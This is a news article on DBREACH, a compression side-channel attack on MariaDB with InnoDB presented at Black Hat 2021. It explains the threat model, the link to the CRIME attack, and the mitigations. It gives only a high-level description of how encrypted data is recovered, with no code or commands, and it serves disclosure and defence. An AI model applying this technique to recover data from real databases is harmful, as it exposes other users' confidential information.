Databases are among the most critical applications for any organization, making them potentially lucrative targets for attackers.
At the Black Hat US 2021 hybrid event on August 5, a team of researchers detailed a new type of attack against databases that could potentially lead to information disclosure and loss. The attack goes by the name DBREACH, which is an acronym for Database Reconnaissance and Exfiltration via Adaptive Compression Heuristics.
Mathew Hogan explained that in modern databases, compression is often paired with encryption in order to reduce storage costs. However, that can potentially be risky as it could lead to exploitation by a class of vulnerabilities known as side-channel attacks.
“With DBREACH, an attacker is able to recover other users’ encrypted content by utilizing a compression side channel," Hogan said. "We believe this is the first compression side-channel attack on a real-world database system."
Over the course of an exhaustive 121-slide presentation, Hogan and his colleagues provided excruciating detail on how a DBREACH attack can work. At its core, DBREACH makes use of some of the same techniques as the CRIME (Compression Ratio Info-leak Made Easy) attack on Transport Layer Security (TLS) that was first disclosed in 2013.
As part of the research, the researchers looked specifically at the MariaDB open source database running with the InnoDB storage engine. Hogan noted that while that was the research team's initial target, the same techniques will likely work on other databases that employ compression and encryption side by side.
According to Hogan, in order for DBREACH to work, an attacker needs the ability to insert and update into a database table, as well as be able to assess the size of a compressed table.
"We believe that this threat model is realistic and achievable," Hogan said. "The update capability can be achieved through a front-end web interface that's backed up by a database table, which is something that's really common in a lot of databases."
Mitigating DBREACH Risk
There are a number of different ways that database users can mitigate the risk for DBREACH.
For one, Hogan suggests that database administrators not use column-level permissions. Additionally, he recommended that organizations monitor database usage patterns for unusual activity. That unusual activity would be similar to Denial of Service (DoS) detection, looking for a single user that is performing an unusually high number of updates.
"The only foolproof method for preventing this attack is to turn off compression," Hogan said.
Hogan added that there is likely to be a performance hit for turning off compression and storage will become more expensive. However, he noted that if the data is very sensitive it might be worth it.
"We believe that this really drives home the point that compression and encryption should be combined very carefully, lest you or your system fall victim to compression side-channel attack," Hogan said.